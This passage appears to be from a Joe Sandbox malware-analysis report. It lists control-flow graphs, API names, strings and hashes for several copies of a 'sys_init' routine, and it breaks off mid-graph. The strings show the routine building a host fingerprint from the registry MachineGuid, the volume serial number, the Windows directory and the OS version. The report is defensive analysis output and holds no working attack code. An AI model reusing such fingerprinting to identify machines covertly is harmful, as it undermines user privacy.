                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                      • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                      • API String ID: 3828489143-883582248
                                                      • Opcode ID: c817d551da7cc0452d1d9372f9cf211be133c768dc978ffa4264da6cb7e203b1
                                                      • Instruction ID: dc52b638c0c50825da5a3d2848ec1eb86de881615554755b5202371625f497cc
                                                      • Opcode Fuzzy Hash: c817d551da7cc0452d1d9372f9cf211be133c768dc978ffa4264da6cb7e203b1
                                                      • Instruction Fuzzy Hash: A1D18329F0E64F85FB129F94E47837922909F47F50F150432EA4E173E3EE6EA8448789

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 505 7ffda55d44cc-7ffda55d44e6 call 7ffda55d4df4 508 7ffda55d44ec-7ffda55d4501 call 7ffda55d4d73 505->508 509 7ffda55d4a08 505->509 514 7ffda55d4557 508->514 515 7ffda55d4503-7ffda55d4531 508->515 511 7ffda55d4a1c-7ffda55d4a21 509->511 513 7ffda55d4569-7ffda55d4580 call 7ffda55d9dc2 511->513 518 7ffda55d4585-7ffda55d4592 513->518 517 7ffda55d455c-7ffda55d4567 FreeLibrary 514->517 523 7ffda55d453a-7ffda55d4555 call 7ffda55d9dc2 515->523 524 7ffda55d4533-7ffda55d4538 515->524 517->513 520 7ffda55d4593-7ffda55d45cc GetNativeSystemInfo GetWindowsDirectoryA 517->520 521 7ffda55d45d2-7ffda55d45f3 GetLastError call 7ffda55d9dc2 520->521 522 7ffda55d46b0-7ffda55d46d3 call 7ffda55d9dc2 520->522 531 7ffda55d45f5 521->531 532 7ffda55d4613-7ffda55d4619 521->532 522->513 533 7ffda55d46d9-7ffda55d470f call 7ffda55d3382 522->533 523->517 524->517 534 7ffda55d4609-7ffda55d460e 531->534 535 7ffda55d45f7-7ffda55d4604 531->535 532->511 536 7ffda55d461f-7ffda55d4625 532->536 545 7ffda55d4715-7ffda55d4717 533->545 546 7ffda55d47c0-7ffda55d47dc call 7ffda55d9dc2 533->546 534->513 535->534 538 7ffda55d4627-7ffda55d462a 536->538 539 7ffda55d465e-7ffda55d4664 536->539 543 7ffda55d462c-7ffda55d462f 538->543 544 7ffda55d4648-7ffda55d464e 538->544 541 7ffda55d466a-7ffda55d4670 539->541 542 7ffda55d4a44-7ffda55d4a49 539->542 549 7ffda55d4676-7ffda55d467c 541->549 550 7ffda55d4a4e-7ffda55d4a53 541->550 542->513 552 7ffda55d4635-7ffda55d4638 543->552 553 7ffda55d4a26-7ffda55d4a2b 543->553 547 7ffda55d4a3a-7ffda55d4a3f 544->547 548 7ffda55d4654-7ffda55d4659 544->548 545->513 554 7ffda55d471d-7ffda55d477a GetVolumeInformationA 545->554 557 7ffda55d47e1 546->557 547->513 548->513 555 7ffda55d4688-7ffda55d468d 549->555 556 7ffda55d467e-7ffda55d4683 549->556 550->513 558 7ffda55d463e-7ffda55d4643 552->558 559 7ffda55d4a30-7ffda55d4a35 552->559 553->513 560 7ffda55d4877-7ffda55d48a9 call 7ffda55d9dc2 554->560 561 7ffda55d4780-7ffda55d47a6 GetLastError call 7ffda55d9dc2 554->561 555->513 556->513 557->545 558->513 559->513 568 7ffda55d48ab-7ffda55d48b7 strlen 560->568 569 7ffda55d48bd-7ffda55d48c4 560->569 566 7ffda55d47e6-7ffda55d47ec 561->566 567 7ffda55d47a8 561->567 573 7ffda55d47f2 566->573 574 7ffda55d4943-7ffda55d4948 566->574 570 7ffda55d47ae-7ffda55d47bb 567->570 571 7ffda55d492f-7ffda55d4934 567->571 568->569 572 7ffda55d4989-7ffda55d498d 568->572 575 7ffda55d48c8-7ffda55d4925 call 7ffda55d9dc2 569->575 570->546 571->513 572->569 576 7ffda55d4993-7ffda55d4997 572->576 577 7ffda55d482b-7ffda55d4831 573->577 578 7ffda55d47f4-7ffda55d47f7 573->578 574->513 585 7ffda55d492a 575->585 576->569 582 7ffda55d499d-7ffda55d49d0 _errno call 7ffda55e1098 _errno 576->582 580 7ffda55d496b-7ffda55d4970 577->580 581 7ffda55d4837-7ffda55d483d 577->581 583 7ffda55d47f9-7ffda55d47fc 578->583 584 7ffda55d4815-7ffda55d481b 578->584 580->513 586 7ffda55d4975-7ffda55d497a 581->586 587 7ffda55d4843-7ffda55d4849 581->587 598 7ffda55d49d2-7ffda55d49d5 582->598 599 7ffda55d49e0-7ffda55d4a03 _errno call 7ffda55d9dc2 582->599 589 7ffda55d4802-7ffda55d4805 583->589 590 7ffda55d494d-7ffda55d4952 583->590 591 7ffda55d4961-7ffda55d4966 584->591 592 7ffda55d4821-7ffda55d4826 584->592 585->518 586->513 593 7ffda55d497f-7ffda55d4984 587->593 594 7ffda55d484f-7ffda55d4854 587->594 596 7ffda55d480b-7ffda55d4810 589->596 597 7ffda55d4957-7ffda55d495c 589->597 590->513 591->513 592->513 593->513 594->513 596->513 597->513 598->575 600 7ffda55d49db 598->600 599->569 600->569
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                      • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                      • API String ID: 3828489143-883582248
                                                      • Opcode ID: 4ed05f86d46a17b0253bea74060348c378426cdfda12dd8b42f4cb128f3c7d95
                                                      • Instruction ID: 8ebfb367a70434341590b6b3682bfdeca5bd5eafb914fff98eb63287c3f2fb02
                                                      • Opcode Fuzzy Hash: 4ed05f86d46a17b0253bea74060348c378426cdfda12dd8b42f4cb128f3c7d95
                                                      • Instruction Fuzzy Hash: 4FD19E2BF0E69AC5FB22DF55A4603B822A0AF43F94F150032DD4E17793DEACE8508749

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 603 7ffdac0f348c-7ffdac0f34a6 call 7ffdac0f3db4 606 7ffdac0f34ac-7ffdac0f34c1 call 7ffdac0f3d33 603->606 607 7ffdac0f39c8 603->607 612 7ffdac0f3517 606->612 613 7ffdac0f34c3-7ffdac0f34f1 606->613 609 7ffdac0f39dc-7ffdac0f39e1 607->609 611 7ffdac0f3529-7ffdac0f3540 call 7ffdac0f1352 609->611 617 7ffdac0f3545-7ffdac0f3552 611->617 614 7ffdac0f351c-7ffdac0f3527 FreeLibrary 612->614 621 7ffdac0f34fa-7ffdac0f3515 call 7ffdac0f1352 613->621 622 7ffdac0f34f3-7ffdac0f34f8 613->622 614->611 616 7ffdac0f3553-7ffdac0f358c GetNativeSystemInfo GetWindowsDirectoryA 614->616 619 7ffdac0f3592-7ffdac0f35b3 GetLastError call 7ffdac0f1352 616->619 620 7ffdac0f3670-7ffdac0f3693 call 7ffdac0f1352 616->620 629 7ffdac0f35b5 619->629 630 7ffdac0f35d3-7ffdac0f35d9 619->630 620->611 631 7ffdac0f3699-7ffdac0f36cf call 7ffdac0fba62 620->631 621->614 622->614 632 7ffdac0f35c9-7ffdac0f35ce 629->632 633 7ffdac0f35b7-7ffdac0f35c4 629->633 630->609 634 7ffdac0f35df-7ffdac0f35e5 630->634 641 7ffdac0f36d5-7ffdac0f36d7 631->641 642 7ffdac0f3780-7ffdac0f379c call 7ffdac0f1352 631->642 632->611 633->632 636 7ffdac0f35e7-7ffdac0f35ea 634->636 637 7ffdac0f361e-7ffdac0f3624 634->637 639 7ffdac0f35ec-7ffdac0f35ef 636->639 640 7ffdac0f3608-7ffdac0f360e 636->640 643 7ffdac0f362a-7ffdac0f3630 637->643 644 7ffdac0f3a04-7ffdac0f3a09 637->644 645 7ffdac0f35f5-7ffdac0f35f8 639->645 646 7ffdac0f39e6-7ffdac0f39eb 639->646 648 7ffdac0f39fa-7ffdac0f39ff 640->648 649 7ffdac0f3614-7ffdac0f3619 640->649 641->611 647 7ffdac0f36dd-7ffdac0f373a GetVolumeInformationA 641->647 659 7ffdac0f37a1 642->659 650 7ffdac0f3636-7ffdac0f363c 643->650 651 7ffdac0f3a0e-7ffdac0f3a13 643->651 644->611 653 7ffdac0f39f0-7ffdac0f39f5 645->653 654 7ffdac0f35fe-7ffdac0f3603 645->654 646->611 655 7ffdac0f3837-7ffdac0f3869 call 7ffdac0f1352 647->655 656 7ffdac0f3740-7ffdac0f3766 GetLastError call 7ffdac0f1352 647->656 648->611 649->611 657 7ffdac0f3648-7ffdac0f364d 650->657 658 7ffdac0f363e-7ffdac0f3643 650->658 651->611 653->611 654->611 666 7ffdac0f386b-7ffdac0f3877 strlen 655->666 667 7ffdac0f387d-7ffdac0f3884 655->667 664 7ffdac0f3768 656->664 665 7ffdac0f37a6-7ffdac0f37ac 656->665 657->611 658->611 659->641 668 7ffdac0f38ef-7ffdac0f38f4 664->668 669 7ffdac0f376e-7ffdac0f377b 664->669 671 7ffdac0f3903-7ffdac0f3908 665->671 672 7ffdac0f37b2 665->672 666->667 670 7ffdac0f3949-7ffdac0f394d 666->670 673 7ffdac0f3888-7ffdac0f38e5 call 7ffdac0f1352 667->673 668->611 669->642 670->667 674 7ffdac0f3953-7ffdac0f3957 670->674 671->611 675 7ffdac0f37eb-7ffdac0f37f1 672->675 676 7ffdac0f37b4-7ffdac0f37b7 672->676 683 7ffdac0f38ea 673->683 674->667 680 7ffdac0f395d-7ffdac0f3990 _errno call 7ffdac100bd8 _errno 674->680 678 7ffdac0f392b-7ffdac0f3930 675->678 679 7ffdac0f37f7-7ffdac0f37fd 675->679 681 7ffdac0f37b9-7ffdac0f37bc 676->681 682 7ffdac0f37d5-7ffdac0f37db 676->682 678->611 688 7ffdac0f3935-7ffdac0f393a 679->688 689 7ffdac0f3803-7ffdac0f3809 679->689 696 7ffdac0f3992-7ffdac0f3995 680->696 697 7ffdac0f39a0-7ffdac0f39c3 _errno call 7ffdac0f1352 680->697 684 7ffdac0f37c2-7ffdac0f37c5 681->684 685 7ffdac0f390d-7ffdac0f3912 681->685 686 7ffdac0f3921-7ffdac0f3926 682->686 687 7ffdac0f37e1-7ffdac0f37e6 682->687 683->617 691 7ffdac0f37cb-7ffdac0f37d0 684->691 692 7ffdac0f3917-7ffdac0f391c 684->692 685->611 686->611 687->611 688->611 693 7ffdac0f393f-7ffdac0f3944 689->693 694 7ffdac0f380f-7ffdac0f3814 689->694 691->611 692->611 693->611 694->611 696->673 699 7ffdac0f399b 696->699 697->667 699->667
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                      • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                      • API String ID: 3828489143-883582248
                                                      • Opcode ID: cdd964b842a92a4dc978594ff5c2acee5fc6d66eea055fb757a1eb4ae4faba1b
                                                      • Instruction ID: 62d48051c33020b43038f3043d302202f8afc04a78f62a8e2198c99262d99fe8
                                                      • Opcode Fuzzy Hash: cdd964b842a92a4dc978594ff5c2acee5fc6d66eea055fb757a1eb4ae4faba1b
                                                      • Instruction Fuzzy Hash: 09D16F62F0F657C1FA268719E4603B92250AF40BF4F184132D94E47796DF2DECA4A38D

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 309 7ffda557210c-7ffda5572126 call 7ffda5572a34 312 7ffda557212c-7ffda5572141 call 7ffda55729b3 309->312 313 7ffda5572648 309->313 318 7ffda5572143-7ffda5572171 312->318 319 7ffda5572197 312->319 315 7ffda557265c-7ffda5572661 313->315 317 7ffda55721a9-7ffda55721c0 call 7ffda55740d2 315->317 323 7ffda55721c5-7ffda55721d2 317->323 327 7ffda5572173-7ffda5572178 318->327 328 7ffda557217a-7ffda5572195 call 7ffda55740d2 318->328 320 7ffda557219c-7ffda55721a7 FreeLibrary 319->320 320->317 322 7ffda55721d3-7ffda557220c GetNativeSystemInfo GetWindowsDirectoryA 320->322 325 7ffda5572212-7ffda5572233 GetLastError call 7ffda55740d2 322->325 326 7ffda55722f0-7ffda5572313 call 7ffda55740d2 322->326 335 7ffda5572253-7ffda5572259 325->335 336 7ffda5572235 325->336 326->317 337 7ffda5572319-7ffda557234f call 7ffda5573402 326->337 327->320 328->320 335->315 340 7ffda557225f-7ffda5572265 335->340 338 7ffda5572249-7ffda557224e 336->338 339 7ffda5572237-7ffda5572244 336->339 347 7ffda5572400-7ffda557241c call 7ffda55740d2 337->347 348 7ffda5572355-7ffda5572357 337->348 338->317 339->338 342 7ffda557229e-7ffda55722a4 340->342 343 7ffda5572267-7ffda557226a 340->343 349 7ffda5572684-7ffda5572689 342->349 350 7ffda55722aa-7ffda55722b0 342->350 345 7ffda557226c-7ffda557226f 343->345 346 7ffda5572288-7ffda557228e 343->346 351 7ffda5572275-7ffda5572278 345->351 352 7ffda5572666-7ffda557266b 345->352 354 7ffda5572294-7ffda5572299 346->354 355 7ffda557267a-7ffda557267f 346->355 365 7ffda5572421 347->365 348->317 353 7ffda557235d-7ffda55723ba GetVolumeInformationA 348->353 349->317 356 7ffda557268e-7ffda5572693 350->356 357 7ffda55722b6-7ffda55722bc 350->357 359 7ffda5572670-7ffda5572675 351->359 360 7ffda557227e-7ffda5572283 351->360 352->317 361 7ffda55723c0-7ffda55723e6 GetLastError call 7ffda55740d2 353->361 362 7ffda55724b7-7ffda55724e9 call 7ffda55740d2 353->362 354->317 355->317 356->317 363 7ffda55722be-7ffda55722c3 357->363 364 7ffda55722c8-7ffda55722cd 357->364 359->317 360->317 370 7ffda55723e8 361->370 371 7ffda5572426-7ffda557242c 361->371 372 7ffda55724fd-7ffda5572504 362->372 373 7ffda55724eb-7ffda55724f7 strlen 362->373 363->317 364->317 365->348 374 7ffda557256f-7ffda5572574 370->374 375 7ffda55723ee-7ffda55723fb 370->375 377 7ffda5572583-7ffda5572588 371->377 378 7ffda5572432 371->378 379 7ffda5572508-7ffda5572565 call 7ffda55740d2 372->379 373->372 376 7ffda55725c9-7ffda55725cd 373->376 374->317 375->347 376->372 380 7ffda55725d3-7ffda55725d7 376->380 377->317 381 7ffda5572434-7ffda5572437 378->381 382 7ffda557246b-7ffda5572471 378->382 389 7ffda557256a 379->389 380->372 386 7ffda55725dd-7ffda5572610 _errno call 7ffda55829b8 _errno 380->386 387 7ffda5572439-7ffda557243c 381->387 388 7ffda5572455-7ffda557245b 381->388 384 7ffda55725ab-7ffda55725b0 382->384 385 7ffda5572477-7ffda557247d 382->385 384->317 392 7ffda5572483-7ffda5572489 385->392 393 7ffda55725b5-7ffda55725ba 385->393 402 7ffda5572612-7ffda5572615 386->402 403 7ffda5572620-7ffda5572643 _errno call 7ffda55740d2 386->403 395 7ffda5572442-7ffda5572445 387->395 396 7ffda557258d-7ffda5572592 387->396 390 7ffda55725a1-7ffda55725a6 388->390 391 7ffda5572461-7ffda5572466 388->391 389->323 390->317 391->317 399 7ffda55725bf-7ffda55725c4 392->399 400 7ffda557248f-7ffda5572494 392->400 393->317 397 7ffda557244b-7ffda5572450 395->397 398 7ffda5572597-7ffda557259c 395->398 396->317 397->317 398->317 399->317 400->317 402->379 404 7ffda557261b 402->404 403->372 404->372
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                      • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                      • API String ID: 3828489143-883582248
                                                      • Opcode ID: 5e62ecca713295fe955be0967b7d2f89ab1daee2a14d8cfdcbfcc6e33fcf6337
                                                      • Instruction ID: 0b9ab08f12bfa02f74d9900ded9780ca500c1891b49f4995064c24ae28f55ef6
                                                      • Opcode Fuzzy Hash: 5e62ecca713295fe955be0967b7d2f89ab1daee2a14d8cfdcbfcc6e33fcf6337
                                                      • Instruction Fuzzy Hash: FAD1B129F0E65BC1FB228F54E8703B822A0AF43F54F950472E94D47B92DF2CE9859749

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 701 7ffdac126e0c-7ffdac126e26 call 7ffdac127734 704 7ffdac127348 701->704 705 7ffdac126e2c-7ffdac126e41 call 7ffdac1276b3 701->705 707 7ffdac12735c-7ffdac127361 704->707 710 7ffdac126e43-7ffdac126e71 705->710 711 7ffdac126e97 705->711 709 7ffdac126ea9-7ffdac126ec0 call 7ffdac1277a2 707->709 715 7ffdac126ec5-7ffdac126ed2 709->715 719 7ffdac126e73-7ffdac126e78 710->719 720 7ffdac126e7a-7ffdac126e95 call 7ffdac1277a2 710->720 712 7ffdac126e9c-7ffdac126ea7 FreeLibrary 711->712 712->709 714 7ffdac126ed3-7ffdac126f0c GetNativeSystemInfo GetWindowsDirectoryA 712->714 717 7ffdac126ff0-7ffdac127013 call 7ffdac1277a2 714->717 718 7ffdac126f12-7ffdac126f33 GetLastError call 7ffdac1277a2 714->718 717->709 729 7ffdac127019-7ffdac12704f call 7ffdac12d3f2 717->729 727 7ffdac126f53-7ffdac126f59 718->727 728 7ffdac126f35 718->728 719->712 720->712 727->707 732 7ffdac126f5f-7ffdac126f65 727->732 730 7ffdac126f37-7ffdac126f44 728->730 731 7ffdac126f49-7ffdac126f4e 728->731 739 7ffdac127100-7ffdac12711c call 7ffdac1277a2 729->739 740 7ffdac127055-7ffdac127057 729->740 730->731 731->709 734 7ffdac126f9e-7ffdac126fa4 732->734 735 7ffdac126f67-7ffdac126f6a 732->735 741 7ffdac127384-7ffdac127389 734->741 742 7ffdac126faa-7ffdac126fb0 734->742 737 7ffdac126f88-7ffdac126f8e 735->737 738 7ffdac126f6c-7ffdac126f6f 735->738 746 7ffdac126f94-7ffdac126f99 737->746 747 7ffdac12737a-7ffdac12737f 737->747 743 7ffdac127366-7ffdac12736b 738->743 744 7ffdac126f75-7ffdac126f78 738->744 757 7ffdac127121 739->757 740->709 745 7ffdac12705d-7ffdac1270ba GetVolumeInformationA 740->745 741->709 748 7ffdac12738e-7ffdac127393 742->748 749 7ffdac126fb6-7ffdac126fbc 742->749 743->709 751 7ffdac126f7e-7ffdac126f83 744->751 752 7ffdac127370-7ffdac127375 744->752 753 7ffdac1270c0-7ffdac1270e6 GetLastError call 7ffdac1277a2 745->753 754 7ffdac1271b7-7ffdac1271e9 call 7ffdac1277a2 745->754 746->709 747->709 748->709 755 7ffdac126fbe-7ffdac126fc3 749->755 756 7ffdac126fc8-7ffdac126fcd 749->756 751->709 752->709 762 7ffdac127126-7ffdac12712c 753->762 763 7ffdac1270e8 753->763 764 7ffdac1271fd-7ffdac127204 754->764 765 7ffdac1271eb-7ffdac1271f7 strlen 754->765 755->709 756->709 757->740 769 7ffdac127132 762->769 770 7ffdac127283-7ffdac127288 762->770 766 7ffdac1270ee-7ffdac1270fb 763->766 767 7ffdac12726f-7ffdac127274 763->767 771 7ffdac127208-7ffdac127265 call 7ffdac1277a2 764->771 765->764 768 7ffdac1272c9-7ffdac1272cd 765->768 766->739 767->709 768->764 772 7ffdac1272d3-7ffdac1272d7 768->772 773 7ffdac127134-7ffdac127137 769->773 774 7ffdac12716b-7ffdac127171 769->774 770->709 781 7ffdac12726a 771->781 772->764 778 7ffdac1272dd-7ffdac127310 _errno call 7ffdac1325d0 _errno 772->778 779 7ffdac127155-7ffdac12715b 773->779 780 7ffdac127139-7ffdac12713c 773->780 776 7ffdac127177-7ffdac12717d 774->776 777 7ffdac1272ab-7ffdac1272b0 774->777 784 7ffdac127183-7ffdac127189 776->784 785 7ffdac1272b5-7ffdac1272ba 776->785 777->709 794 7ffdac127320-7ffdac127343 _errno call 7ffdac1277a2 778->794 795 7ffdac127312-7ffdac127315 778->795 782 7ffdac1272a1-7ffdac1272a6 779->782 783 7ffdac127161-7ffdac127166 779->783 787 7ffdac12728d-7ffdac127292 780->787 788 7ffdac127142-7ffdac127145 780->788 781->715 782->709 783->709 791 7ffdac1272bf-7ffdac1272c4 784->791 792 7ffdac12718f-7ffdac127194 784->792 785->709 787->709 789 7ffdac127297-7ffdac12729c 788->789 790 7ffdac12714b-7ffdac127150 788->790 789->709 790->709 791->709 792->709 794->764 795->771 796 7ffdac12731b 795->796 796->764
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                      • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                      • API String ID: 3828489143-883582248
                                                      • Opcode ID: a19611df617a611f040681802e7fcf2e2ba08df4a7e16da449a0efe9d34672f6
                                                      • Instruction ID: 50199b991adbe07a5e032486247b5f2f8deecd754d1cdf21f6b95f35aab1c30e
                                                      • Opcode Fuzzy Hash: a19611df617a611f040681802e7fcf2e2ba08df4a7e16da449a0efe9d34672f6
                                                      • Instruction Fuzzy Hash: E0D17E6BF1EA53C1FB629715E5703B92290AF617F8F544036D94D17392DE2CEC84838A

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 936 7ff70cad28fc-7ff70cad2916 call 7ff70cad2304 939 7ff70cad291c-7ff70cad2931 call 7ff70cad2283 936->939 940 7ff70cad2e38 936->940 945 7ff70cad2933-7ff70cad2961 939->945 946 7ff70cad2987 939->946 942 7ff70cad2e4c-7ff70cad2e51 940->942 944 7ff70cad2999-7ff70cad29b0 call 7ff70cad2ef2 942->944 950 7ff70cad29b5-7ff70cad29c2 944->950 954 7ff70cad2963-7ff70cad2968 945->954 955 7ff70cad296a-7ff70cad2985 call 7ff70cad2ef2 945->955 947 7ff70cad298c-7ff70cad2997 FreeLibrary 946->947 947->944 949 7ff70cad29c3-7ff70cad29fc GetNativeSystemInfo GetWindowsDirectoryA 947->949 952 7ff70cad2ae0-7ff70cad2b03 call 7ff70cad2ef2 949->952 953 7ff70cad2a02-7ff70cad2a23 GetLastError call 7ff70cad2ef2 949->953 952->944 964 7ff70cad2b09-7ff70cad2b3f call 7ff70cad9242 952->964 962 7ff70cad2a43-7ff70cad2a49 953->962 963 7ff70cad2a25 953->963 954->947 955->947 962->942 967 7ff70cad2a4f-7ff70cad2a55 962->967 965 